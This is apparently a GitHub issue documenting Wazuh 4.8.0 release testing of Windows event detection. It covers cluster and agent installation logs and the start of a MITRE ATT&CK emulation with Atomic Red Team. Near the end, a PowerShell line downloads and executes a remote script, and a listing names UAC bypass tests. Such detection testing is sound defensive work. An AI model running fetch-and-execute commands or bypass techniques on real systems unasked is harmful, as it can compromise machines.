Release 4.8.0 - Beta 2 - E2E UX tests - Windows events

[davidjiglesias]

End-to-End (E2E) Testing Guideline

• Documentation: Always consult the development documentation for the current stage tag at this link. Be careful because some of the description steps might refer to a current version in production, always navigate using the current development documention for the stage under test. Also, visit the following pre-release package guide to understand how to modify certain links and urls for the correct testing of the development packages.
• Test Requirements: Ensure your test comprehensively includes a full stack and agent/s deployment as per the Deployment requirements, detailing the machine OS, installed version, and revision.
• Deployment Options: While deployments can be local (using VMs, Vagrant, etc) or on the aws-dev account, opt for local deployments when feasible. For AWS access, coordinate with the CICD team through this link.
• External Accounts: If tests require third-party accounts (e.g., GitHub, Azure, AWS, GCP), request the necessary access through the CICD team here.
• Alerts: Every test should generate a minimum of one end-to-end alert, from the agent to the dashboard, irrespective of test type.
• Multi-node Testing: For multi-node wazuh-manager tests, ensure agents are connected to both workers and the master node.
• Package Verification: Use the pre-release package that matches the current TAG you're testing. Confirm its version and revision.
• Filebeat Errors: If you encounter errors with Filebeat during testing, refer to this Slack discussion for insights and resolutions.
• Known Issues: Familiarize yourself with previously reported issues in the Known Issues section. This helps in identifying already recognized errors during testing.
• Reporting New Issues: Any new errors discovered during testing that aren't listed under Known Issues should be reported. Assign the issue to the corresponding team (QA if unsure), add the Release testing objective and Very high priority. Communicate these to the team and QA via the c-release Slack channel.
• Test Conduct: It's imperative to be thorough in your testing, offering enough detail for reviewers. Incomplete tests might necessitate a redo.
• Documentation Feedback: Encountering documentation gaps, unclear guidelines, or anything that disrupts the testing or UX? Open an issue, especially if it's not listed under Known Issues. Please answer the feedback section, this is a mandatory step.
• Format: If this is your first time doing this, refer to the format (but not necessarily the content, as it may vary) of previous E2E tests, here you have an example https://github.com/wazuh/wazuh/issues/13994.
• Status and completion: Change the issue status within your team project accordingly. Once you finish testing and write the conclusions, move it to Pending review and notify the @wazuh/devel-core1-div1 team via Slack using the c-release channel. Beware that the reviewers might request additional information or task repetitions.
• For reviewers: Please move the issue to Pending final review and notify via Slack using the same thread if everything is ok, otherwise, perform an issue update with the requested changes and move it to On hold, increase the review_cycles in the team project by one and notify the issue assignee via Slack using the same thread.

For the conclusions and the issue testing and updates, use the following legend:

Status legend

• 🟢 All checks passed
• 🟡 Found a known issue
• 🔴 Found a new error

Issue delivery and completion

• Initial delivery: The issue's assignee must complete the testing and deliver the results by Feb 27, 2024 and notify the @wazuh/devel-core1-div1 team via Slack using the c-release channel
• Review: The @wazuh/devel-core1-div1 team will assign a reviewer and add it to the review_assignee field in the project. The reviewer must then review the test steps and results. Ensure that all iteration cycles are completed by Feb 28, 2024 date (issue must be in Pending final review status) and notify the QA team via Slack using the c-release channel.
• Auditor: The QA team must audit, validate the results, and close the issue by Feb 29, 2024.

Deployment requirements

Component	Installation	Type	OS
Indexer	Installation assistant	Single node	Oracle Linux 9 x86_64
Server	Installation assistant	Multi node	Oracle Linux 9 x86_64
Dashboard	Installation assistant	-	Oracle Linux 9 x86_64
Agent	Wazuh WUI one-liner deploy using IP and GROUP (created beforehand, don't use default)	-	Windows Server 2022 x86_64, Windows 11 x86_64

Test description

Test that Windows data collection works out of the box. Check that for the same Windows events, the alert rule IDs are the same as in the previous version. Test the following blog post: https://wazuh.com/blog/emulation-of-attck-techniques-and-detection-with-wazuh/ Install sysmon and create Wazuh rules as mentioned, to ensure that everything works as intended in the blog post (use the current release under test instead of 4.2.0) Use the blogpost as a mere guide for testing some Windows events and the use cases, do not report issues with the blogpost itself, outdated commands, etc.

Known issues

• https://github.com/wazuh/wazuh-dashboard-plugins/issues/3925
• https://github.com/wazuh/wazuh-dashboard-plugins/issues/3927
• https://github.com/wazuh/wazuh-documentation/issues/4986
• https://github.com/wazuh/wazuh/issues/12977
• https://github.com/wazuh/wazuh-documentation/issues/5672

Conclusions

I have met the end of the test without any possible issue.

Feedback

We value your feedback. Please provide insights on your testing experience.

• Was the testing guideline clear? Were there any ambiguities?
  • clear enough, maybe the order of the guide itself can change, but that's my opinion.
• Did you face any challenges not covered by the guideline?
  • Not regarding the guideline, but achieving the completeness of the test with the resources needed.
• Suggestions for improvement:
  • pay attention to the requirements of each mitre technique. installing dot net sdk, or office in the agent.

Reviewers validation

The criteria for completing this task is based on the validation of the conclusions and the test results by all reviewers.

All the checkboxes below must be marked in order to close this issue.

• [ ] @davidjiglesias
• [x] @wazuh/devel-core1-div1

[LucioDonda]

Environment setup

Host information

Server wazuh-1 [192.168.56.34]

``` shell [root@vm-oracle9 vagrant]# cat /etc/os-release NAME="Oracle Linux Server" VERSION="9.3" ID="ol" ID_LIKE="fedora" VARIANT="Server" VARIANT_ID="server" VERSION_ID="9.3" PLATFORM_ID="platform:el9" PRETTY_NAME="Oracle Linux Server 9.3" ANSI_COLOR="0;31" CPE_NAME="cpe:/o:oracle:linux:9:3:server" HOME_URL="https://linux.oracle.com/" BUG_REPORT_URL="https://github.com/oracle/oracle-linux" ORACLE_BUGZILLA_PRODUCT="Oracle Linux 9" ORACLE_BUGZILLA_PRODUCT_VERSION=9.3 ORACLE_SUPPORT_PRODUCT="Oracle Linux" ORACLE_SUPPORT_PRODUCT_VERSION=9.3 ``` ``` shell [root@vm-oracle9 vagrant]# lscpu Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Address sizes: 48 bits physical, 48 bits virtual Byte Order: Little Endian CPU(s): 4 On-line CPU(s) list: 0-3 Vendor ID: AuthenticAMD Model name: AMD Ryzen 5 4500U with Radeon Graphics CPU family: 23 Model: 96 Thread(s) per core: 1 Core(s) per socket: 4 Socket(s): 1 Stepping: 1 BogoMIPS: 4741.09 Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm constant_tsc rep_goo d nopl nonstop_tsc cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 cx16 ss e4_1 sse4_2 x2apic movbe popcnt aes xsave avx rdrand hypervisor lahf_lm cmp_leg acy cr8_legacy abm sse4a misalignsse 3dnowprefetch ssbd vmmcall fsgsbase bmi1 a vx2 bmi2 rdseed clflushopt arat Virtualization features: Hypervisor vendor: KVM Virtualization type: full Caches (sum of all): L1d: 128 KiB (4 instances) L1i: 128 KiB (4 instances) L2: 2 MiB (4 instances) L3: 32 MiB (4 instances) NUMA: NUMA node(s): 1 NUMA node0 CPU(s): 0-3 Vulnerabilities: Gather data sampling: Not affected Itlb multihit: Not affected L1tf: Not affected Mds: Not affected Meltdown: Not affected Mmio stale data: Not affected Retbleed: Mitigation; untrained return thunk; SMT disabled Spec rstack overflow: Vulnerable: Safe RET, no microcode Spec store bypass: Not affected Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization Spectre v2: Mitigation; Retpolines, STIBP disabled, RSB filling, PBRSB-eIBRS Not affected Srbds: Not affected Tsx async abort: Not affected ``` ``` shell [root@vm-oracle9 vagrant]# free total used free shared buff/cache available Mem: 971500 366752 594204 5340 164456 604748 Swap: 0 0 0 ``` ``` shell [root@vm-oracle9 vagrant]# lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS sda 8:0 0 128G 0 disk ├─sda1 8:1 0 1G 0 part /boot └─sda2 8:2 0 127G 0 part └─ol_oracle9-root 253:0 0 70G 0 lvm / ```

Server 2 [192.168.56.32]

``` shell [vagrant@vm-oracle9 ~]$ cat /etc/*release Oracle Linux Server release 9.3 NAME="Oracle Linux Server" VERSION="9.3" ID="ol" ID_LIKE="fedora" VARIANT="Server" VARIANT_ID="server" VERSION_ID="9.3" PLATFORM_ID="platform:el9" PRETTY_NAME="Oracle Linux Server 9.3" ANSI_COLOR="0;31" CPE_NAME="cpe:/o:oracle:linux:9:3:server" HOME_URL="https://linux.oracle.com/" BUG_REPORT_URL="https://github.com/oracle/oracle-linux" ORACLE_BUGZILLA_PRODUCT="Oracle Linux 9" ORACLE_BUGZILLA_PRODUCT_VERSION=9.3 ORACLE_SUPPORT_PRODUCT="Oracle Linux" ORACLE_SUPPORT_PRODUCT_VERSION=9.3 Red Hat Enterprise Linux release 9.3 (Plow) Oracle Linux Server release 9.3 ``` ``` shell [vagrant@vm-oracle9 ~]$ lscpu Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Address sizes: 48 bits physical, 48 bits virtual Byte Order: Little Endian CPU(s): 4 On-line CPU(s) list: 0-3 Vendor ID: AuthenticAMD Model name: AMD Ryzen 5 4500U with Radeon Graphics CPU family: 23 Model: 96 Thread(s) per core: 1 Core(s) per socket: 4 Socket(s): 1 Stepping: 1 BogoMIPS: 4741.09 Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm constant_tsc rep_goo d nopl nonstop_tsc cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 cx16 ss e4_1 sse4_2 x2apic movbe popcnt aes xsave avx rdrand hypervisor lahf_lm cmp_leg acy cr8_legacy abm sse4a misalignsse 3dnowprefetch ssbd vmmcall fsgsbase bmi1 a vx2 bmi2 rdseed clflushopt arat Virtualization features: Hypervisor vendor: KVM Virtualization type: full Caches (sum of all): L1d: 128 KiB (4 instances) L1i: 128 KiB (4 instances) L2: 2 MiB (4 instances) L3: 32 MiB (4 instances) NUMA: NUMA node(s): 1 NUMA node0 CPU(s): 0-3 Vulnerabilities: Gather data sampling: Not affected Itlb multihit: Not affected L1tf: Not affected Mds: Not affected Meltdown: Not affected Mmio stale data: Not affected Retbleed: Mitigation; untrained return thunk; SMT disabled Spec rstack overflow: Vulnerable: Safe RET, no microcode Spec store bypass: Not affected Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization Spectre v2: Mitigation; Retpolines, STIBP disabled, RSB filling, PBRSB-eIBRS Not affected Srbds: Not affected Tsx async abort: Not affected ``` ```shell [vagrant@vm-oracle9 ~]$ free total used free shared buff/cache available Mem: 971500 325200 648712 5352 142820 646300 Swap: 0 0 0 ``` ```shell [vagrant@vm-oracle9 ~]$ lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS sda 8:0 0 128G 0 disk ├─sda1 8:1 0 1G 0 part /boot └─sda2 8:2 0 127G 0 part └─ol_oracle9-root 253:0 0 70G 0 lvm / ```

Indexer / Dashboard [192.168.56.35]

``` shell [root@vm-oracle9 vagrant]# cat /etc/*release Oracle Linux Server release 9.3 NAME="Oracle Linux Server" VERSION="9.3" ID="ol" ID_LIKE="fedora" VARIANT="Server" VARIANT_ID="server" VERSION_ID="9.3" PLATFORM_ID="platform:el9" PRETTY_NAME="Oracle Linux Server 9.3" ANSI_COLOR="0;31" CPE_NAME="cpe:/o:oracle:linux:9:3:server" HOME_URL="https://linux.oracle.com/" BUG_REPORT_URL="https://github.com/oracle/oracle-linux" ORACLE_BUGZILLA_PRODUCT="Oracle Linux 9" ORACLE_BUGZILLA_PRODUCT_VERSION=9.3 ORACLE_SUPPORT_PRODUCT="Oracle Linux" ORACLE_SUPPORT_PRODUCT_VERSION=9.3 Red Hat Enterprise Linux release 9.3 (Plow) Oracle Linux Server release 9.3 ``` ``` shell [root@vm-oracle9 vagrant]# lscpu Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Address sizes: 48 bits physical, 48 bits virtual Byte Order: Little Endian CPU(s): 4 On-line CPU(s) list: 0-3 Vendor ID: AuthenticAMD Model name: AMD Ryzen 5 4500U with Radeon Graphics CPU family: 23 Model: 96 Thread(s) per core: 1 Core(s) per socket: 4 Socket(s): 1 Stepping: 1 BogoMIPS: 4741.09 Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm constant_tsc rep_goo d nopl nonstop_tsc cpuid extd_apicid tsc_known_freq pni pclmulqdq ssse3 cx16 ss e4_1 sse4_2 x2apic movbe popcnt aes xsave avx rdrand hypervisor lahf_lm cmp_leg acy cr8_legacy abm sse4a misalignsse 3dnowprefetch ssbd vmmcall fsgsbase bmi1 a vx2 bmi2 rdseed clflushopt arat Virtualization features: Hypervisor vendor: KVM Virtualization type: full Caches (sum of all): L1d: 128 KiB (4 instances) L1i: 128 KiB (4 instances) L2: 2 MiB (4 instances) L3: 32 MiB (4 instances) NUMA: NUMA node(s): 1 NUMA node0 CPU(s): 0-3 Vulnerabilities: Gather data sampling: Not affected Itlb multihit: Not affected L1tf: Not affected Mds: Not affected Meltdown: Not affected Mmio stale data: Not affected Retbleed: Mitigation; untrained return thunk; SMT disabled Spec rstack overflow: Vulnerable: Safe RET, no microcode Spec store bypass: Not affected Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization Spectre v2: Mitigation; Retpolines, STIBP disabled, RSB filling, PBRSB-eIBRS Not affected Srbds: Not affected Tsx async abort: Not affected ``` ```shell [root@vm-oracle9 vagrant]# free total used free shared buff/cache available Mem: 971500 328348 645556 5336 142824 643152 Swap: 0 0 0 ``` ```shell [root@vm-oracle9 vagrant]# lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS sda 8:0 0 128G 0 disk ├─sda1 8:1 0 1G 0 part /boot └─sda2 8:2 0 127G 0 part └─ol_oracle9-root 253:0 0 70G 0 lvm / ```

Agent Windows Server 2022


Agent Windows 11


[LucioDonda]

Installation 🟢

Indexer / Dashboard [192.168.56.35]

``` shell curl -sO https://packages-dev.wazuh.com/4.8/wazuh-install.sh curl -sO https://packages-dev.wazuh.com/4.8/config.yml ``` config file: ``` config nodes: # Wazuh indexer nodes indexer: - name: node-1 ip: 192.168.56.35 # Wazuh server nodes server: - name: wazuh-1 ip: 192.168.56.34 node_type: master - name: wazuh-2 ip: 192.168.56.32 node_type: worker # Wazuh dashboard nodes dashboard: - name: dashboard ip: 192.168.56.35 ``` Generating config files ``` shell [root@vm-oracle9 vagrant]# bash wazuh-install.sh --generate-config-files -i 26/02/2024 17:56:08 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0 26/02/2024 17:56:08 INFO: Verbose logging redirected to /var/log/wazuh-install.log 26/02/2024 17:56:16 WARNING: Hardware and system checks ignored. 26/02/2024 17:56:16 INFO: --- Configuration files --- 26/02/2024 17:56:16 INFO: Generating configuration files. 26/02/2024 17:56:16 INFO: Generating the root certificate. 26/02/2024 17:56:17 INFO: Generating Admin certificates. 26/02/2024 17:56:17 INFO: Generating Wazuh indexer certificates. 26/02/2024 17:56:17 INFO: Generating Filebeat certificates. 26/02/2024 17:56:18 INFO: Generating Wazuh dashboard certificates. 26/02/2024 17:56:18 INFO: Created wazuh-install-files.tar. It contains the Wazuh cluster key, certificates, and passwords necessary for installation. ``` Installation ``` shell [root@vm-oracle9 vagrant]# bash wazuh-install.sh --wazuh-indexer node-1 -i -o 26/02/2024 19:06:37 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0 26/02/2024 19:06:37 INFO: Verbose logging redirected to /var/log/wazuh-install.log 26/02/2024 19:06:45 WARNING: Hardware and system checks ignored. 26/02/2024 19:06:46 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on these ports: 9200, 9300. 26/02/2024 19:06:48 INFO: Wazuh development repository added. 26/02/2024 19:06:49 INFO: --- Wazuh indexer --- 26/02/2024 19:06:49 INFO: Starting Wazuh indexer installation. 26/02/2024 19:13:43 INFO: Wazuh indexer installation finished. 26/02/2024 19:13:43 INFO: Wazuh indexer post-install configuration finished. 26/02/2024 19:13:43 INFO: Starting service wazuh-indexer. 26/02/2024 19:13:57 INFO: wazuh-indexer service started. 26/02/2024 19:13:57 INFO: Initializing Wazuh indexer cluster security settings. 26/02/2024 19:14:00 INFO: Wazuh indexer cluster initialized. 26/02/2024 19:14:00 INFO: Installation finished. ``` Start cluster ``` shell [root@vm-oracle9 vagrant]# bash wazuh-install.sh --start-cluster -i 26/02/2024 19:19:16 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0 26/02/2024 19:19:16 INFO: Verbose logging redirected to /var/log/wazuh-install.log 26/02/2024 19:19:23 WARNING: Hardware and system checks ignored. 26/02/2024 19:19:33 INFO: Wazuh indexer cluster security configuration initialized. 26/02/2024 19:20:02 INFO: Updating the internal users. 26/02/2024 19:20:05 INFO: A backup of the internal users has been saved in the /etc/wazuh-indexer/internalusers-backup folder. 26/02/2024 19:20:13 INFO: Wazuh indexer cluster started. ``` Confirm installation and cluster ``` shell [root@vm-oracle9 vagrant]# curl -k -u admin:############ https://192.168.56.35:9200 { "name" : "node-1", "cluster_name" : "wazuh-indexer-cluster", "cluster_uuid" : "-s56LeitS2O2gJ3ZhwqiVg", "version" : { "number" : "7.10.2", "build_type" : "rpm", "build_hash" : "eee49cb340edc6c4d489bcd9324dda571fc8dc03", "build_date" : "2023-09-20T23:54:29.889267151Z", "build_snapshot" : false, "lucene_version" : "9.7.0", "minimum_wire_compatibility_version" : "7.10.0", "minimum_index_compatibility_version" : "7.0.0" }, "tagline" : "The OpenSearch Project: https://opensearch.org/" } [root@vm-oracle9 vagrant]# curl -k -u admin:############ https://192.168.56.35:9200/_cat/nodes?v ip heap.percent ram.percent cpu load_1m load_5m load_15m node.role node.roles cluster_manager name 192.168.56.35 12 94 3 0.07 0.13 0.10 dimr data,ingest,master,remote_cluster_client * node-1 ```

Server wazuh-1 [192.168.56.34]

disbaling some ports on firewall ``` shell [root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1514/tcp success [root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1515/tcp success [root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1516/tcp success [root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=55000/tcp success [root@vm-oracle9 vagrant]# firewall-cmd --reload success [root@vm-oracle9 vagrant]# firewall-cmd --zone=public --list-ports 1514/tcp 1515/tcp 1516/tcp 55000/tcp ``` installing ``` shell [root@vm-oracle9 vagrant]# bash wazuh-install.sh --wazuh-server wazuh-1 -i 26/02/2024 19:54:16 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0 26/02/2024 19:54:16 INFO: Verbose logging redirected to /var/log/wazuh-install.log 26/02/2024 19:54:23 WARNING: Hardware and system checks ignored. 26/02/2024 19:54:24 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on these ports: 1514, 1515, 1516, 55000. 26/02/2024 19:54:27 INFO: Wazuh development repository added. 26/02/2024 19:54:27 INFO: --- Wazuh server --- 26/02/2024 19:54:27 INFO: Starting the Wazuh manager installation. 26/02/2024 19:57:13 INFO: Wazuh manager installation finished. 26/02/2024 19:57:13 INFO: Wazuh manager vulnerability detection configuration finished. 26/02/2024 19:57:13 INFO: Starting service wazuh-manager. 26/02/2024 19:57:23 INFO: wazuh-manager service started. 26/02/2024 19:57:23 INFO: Starting Filebeat installation. 26/02/2024 19:58:08 INFO: Filebeat installation finished. 26/02/2024 19:58:14 INFO: Filebeat post-install configuration finished. 26/02/2024 19:58:49 INFO: Starting service filebeat. 26/02/2024 19:58:50 INFO: filebeat service started. 26/02/2024 19:58:50 INFO: Installation finished. ``` checking installation ``` shell [root@vm-oracle9 vagrant]# systemctl status wazuh-manager.service ● wazuh-manager.service - Wazuh manager Loaded: loaded (/usr/lib/systemd/system/wazuh-manager.service; enabled; preset: disabled) Active: active (running) since Mon 2024-02-26 19:58:47 UTC; 13s ago Tasks: 154 (limit: 24732) Memory: 680.6M CPU: 23.649s CGroup: /system.slice/wazuh-manager.service ├─8080 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py ├─8081 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py ├─8084 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py ├─8087 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py ├─8129 /var/ossec/bin/wazuh-authd ├─8147 /var/ossec/bin/wazuh-db ├─8175 /var/ossec/bin/wazuh-execd ├─8189 /var/ossec/bin/wazuh-analysisd ├─8199 /var/ossec/bin/wazuh-syscheckd ├─8214 /var/ossec/bin/wazuh-remoted ├─8284 /var/ossec/bin/wazuh-logcollector ├─8301 /var/ossec/bin/wazuh-monitord ├─8311 /var/ossec/bin/wazuh-modulesd ├─8934 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_clusterd> ├─8945 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_clusterd> └─8946 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_clusterd> ```

Server 2 [192.168.56.32]

Disabling firewall on some ports ``` shell [root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1514/tcp success [root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1515/tcp success [root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=1516/tcp success [root@vm-oracle9 vagrant]# firewall-cmd --permanent --zone=public --add-port=55000/tcp success [root@vm-oracle9 vagrant]# firewall-cmd --reload success [root@vm-oracle9 vagrant]# firewall-cmd --zone=public --list-ports 1514/tcp 1515/tcp 1516/tcp 55000/tcp ``` Installing ``` shell [root@vm-oracle9 vagrant]# bash wazuh-install.sh --wazuh-server wazuh-2 -i 26/02/2024 20:14:17 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0 26/02/2024 20:14:17 INFO: Verbose logging redirected to /var/log/wazuh-install.log 26/02/2024 20:14:24 WARNING: Hardware and system checks ignored. 26/02/2024 20:14:25 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on these ports: 1514, 1515, 1516, 55000. 26/02/2024 20:14:28 INFO: Wazuh development repository added. 26/02/2024 20:14:28 INFO: --- Wazuh server --- 26/02/2024 20:14:28 INFO: Starting the Wazuh manager installation. 26/02/2024 20:19:52 INFO: Wazuh manager installation finished. 26/02/2024 20:19:53 INFO: Wazuh manager vulnerability detection configuration finished. 26/02/2024 20:19:53 INFO: Starting service wazuh-manager. 26/02/2024 20:20:06 INFO: wazuh-manager service started. 26/02/2024 20:20:06 INFO: Starting Filebeat installation. 26/02/2024 20:21:27 INFO: Filebeat installation finished. 26/02/2024 20:21:30 INFO: Filebeat post-install configuration finished. 26/02/2024 20:22:02 INFO: Starting service filebeat. 26/02/2024 20:22:03 INFO: filebeat service started. 26/02/2024 20:22:03 INFO: Installation finished. ``` Checking installation ``` shell [root@vm-oracle9 vagrant]# systemctl status wazuh-manager.service ● wazuh-manager.service - Wazuh manager Loaded: loaded (/usr/lib/systemd/system/wazuh-manager.service; enabled; preset: disabled) Active: active (running) since Mon 2024-02-26 20:22:02 UTC; 2min 43s ago Tasks: 171 (limit: 5819) Memory: 609.1M CPU: 37.044s CGroup: /system.slice/wazuh-manager.service ├─ 9521 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py ├─ 9522 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py ├─ 9525 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py ├─ 9528 /var/ossec/framework/python/bin/python3 /var/ossec/api/scripts/wazuh-apid.py ├─ 9570 /var/ossec/bin/wazuh-authd ├─ 9583 /var/ossec/bin/wazuh-db ├─ 9609 /var/ossec/bin/wazuh-execd ├─ 9621 /var/ossec/bin/wazuh-analysisd ├─ 9631 /var/ossec/bin/wazuh-syscheckd ├─ 9646 /var/ossec/bin/wazuh-remoted ├─ 9731 /var/ossec/bin/wazuh-logcollector ├─ 9750 /var/ossec/bin/wazuh-monitord ├─ 9760 /var/ossec/bin/wazuh-modulesd ├─10407 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_cluster> └─10973 /var/ossec/framework/python/bin/python3 /var/ossec/framework/scripts/wazuh_cluster> Feb 26 20:21:54 vm-oracle9 env[9465]: Started wazuh-syscheckd... Feb 26 20:21:55 vm-oracle9 env[9465]: Started wazuh-remoted... Feb 26 20:21:56 vm-oracle9 env[9465]: Started wazuh-logcollector... Feb 26 20:21:56 vm-oracle9 env[9465]: Started wazuh-monitord... Feb 26 20:21:56 vm-oracle9 env[9758]: 2024/02/26 20:21:56 wazuh-modulesd:router: INFO: Loaded router mo> Feb 26 20:21:56 vm-oracle9 env[9758]: 2024/02/26 20:21:56 wazuh-modulesd:content_manager: INFO: Loaded > Feb 26 20:21:57 vm-oracle9 env[9465]: Started wazuh-modulesd... Feb 26 20:22:00 vm-oracle9 env[9465]: Started wazuh-clusterd... Feb 26 20:22:02 vm-oracle9 env[9465]: Completed. Feb 26 20:22:02 vm-oracle9 systemd[1]: Started Wazuh manager. ```

Dashboard

``` shell -rw-r--r--. 1 root root 177691 Feb 26 17:59 wazuh-install.sh [root@vm-oracle9 vagrant]# bash wazuh-install.sh --wazuh-dashboard dashboard -i 26/02/2024 20:29:26 INFO: Starting Wazuh installation assistant. Wazuh version: 4.8.0 26/02/2024 20:29:26 INFO: Verbose logging redirected to /var/log/wazuh-install.log 26/02/2024 20:29:34 WARNING: Hardware and system checks ignored. 26/02/2024 20:29:34 INFO: Wazuh web interface port will be 443. 26/02/2024 20:29:35 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on this port: 443. 26/02/2024 20:29:37 INFO: Wazuh development repository added. 26/02/2024 20:29:38 INFO: --- Wazuh dashboard ---- 26/02/2024 20:29:38 INFO: Starting Wazuh dashboard installation. 26/02/2024 20:36:58 INFO: Wazuh dashboard installation finished. 26/02/2024 20:36:58 INFO: Wazuh dashboard post-install configuration finished. 26/02/2024 20:36:58 INFO: Starting service wazuh-dashboard. 26/02/2024 20:36:58 INFO: wazuh-dashboard service started. 26/02/2024 20:37:20 INFO: Initializing Wazuh dashboard web application. 26/02/2024 20:37:21 INFO: Wazuh dashboard web application initialized. 26/02/2024 20:37:21 INFO: --- Summary --- 26/02/2024 20:37:21 INFO: You can access the web interface https://192.168.56.35:443 User: admin Password: ########### 26/02/2024 20:37:21 INFO: Installation finished. ``` 

Agents

Installation

  Agent 1 ``` powershell PS C:\Users\vagrant> >> Invoke-WebRequest -Uri https://packages-dev.wazuh.com/pre-release/windows/wazuh-agent-4.8.0-1.msi -OutFile ${env.tmp}\wazuh-agent; msiexec.exe /i ${env.tmp}\wazuh-agent /q WAZUH_MANAGER='192.168.56.34' PS C:\Users\vagrant> NET START WazuhSvc The Wazuh service is starting. The Wazuh service was started successfully. ``` Agent 2 ``` powershell PS C:\Users\vagrant> Invoke-WebRequest -Uri https://packages-dev.wazuh.com/pre-release/windows/wazuh-agent-4.8.0-1.msi -OutFile ${env.tmp}\wazuh-agent; msiexec.exe /i ${env.tmp}\wazuh-agent /q WAZUH_MANAGER='192.168.56.34' PS C:\Users\vagrant> NET START WazuhSvc The Wazuh service is starting. The Wazuh service was started successfully. ``` 

[LucioDonda]

Emulation of ATT&CK techniques and detection with Wazuh

Setting up the environment [Server] 🟢

Add Rule

Modifyng local_rules.xml

```console windows technique_id=T1053,technique_name=Scheduled Task A Newly Scheduled Task has been Detected on $(win.system.computer) T1053 windows technique_id=T1073,technique_name=DLL Side-Loading DLL Side-Loading Detected on $(win.system.computer) T1073 T1574.002 windows technique_id=T1218.010,technique_name=Regsvr32 Signed Binary Proxy Execution using Regsvr32 Detected on $(win.system.computer) T1218 T1117 windows technique_id=T1518.001,technique_name=Security Software Discovery Security Software Discovery Attempt has been Detected on $(win.system.computer) T1518 windows technique_id=T1548.002,technique_name=Bypass User Access Control Privilege Escalation Through Bypass of UAC has been Detected on $(win.system.computer) T1548.002 T1088 ```

Setting up the environment [Agent windows 11] 🟢

Sysmon configuration

Mapping Sysmon rules with MITRE attack techniques

```console ``` ### Capture Sysmon 🟢 Modify ossec.conf ```console Microsoft-Windows-Sysmon/Operational eventchannel ```

Atomic Red Team installation

ART Execution Framework and Atomics folder installation

```console PS C:\Users\vagrant\Sysmon> IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing); PS C:\Users\vagrant\Sysmon> Install-AtomicRedTeam -getAtomics Installation of Invoke-AtomicRedTeam is complete. You can now use the Invoke-AtomicTest function See Wiki at https://github.com/redcanaryco/invoke-atomicredteam/wiki for complete details ```

Importing the ART module

```console PS C:\Users\vagrant\Sysmon> Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force ```

Get details of a particular technique

```console PS C:\Users\vagrant\Sysmon> PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1548.002 -ShowDetailsBrief PathToAtomicsFolder = C:\AtomicRedTeam\atomics T1548.002-1 Bypass UAC using Event Viewer (cmd T1548.002-2 Bypass UAC using Event Viewer (PowerShell T1548.002-3 Bypass UAC using Fodhelper T1548.002-4 Bypass UAC using Fodhelper - PowerShell T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell T1548.002-6 Bypass UAC by Mocking Trusted Directories T1548.002-7 Bypass UAC using sdclt DelegateExecute T1548.002-8 Disable UAC using reg.exe T1548.002-9 Bypass UAC using SilentCleanup task T1548.002-10 UACME Bypass Method 23 T1548.002-11 UACME Bypass Method 31 T1548.002-12 UACME Bypass Method 33 T1548.002-13 UACME Bypass Method 34 T1548.002-14 UACME Bypass Method 39 T1548.002-15 UACME Bypass Method 56 T1548.002-16 UACME Bypass Method 59 T1548.002-17 UACME Bypass Method 61 T1548.002-18 WinPwn - UAC Magic T1548.002-19 WinPwn - UAC Bypass ccmstp technique T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key T1548.002-23 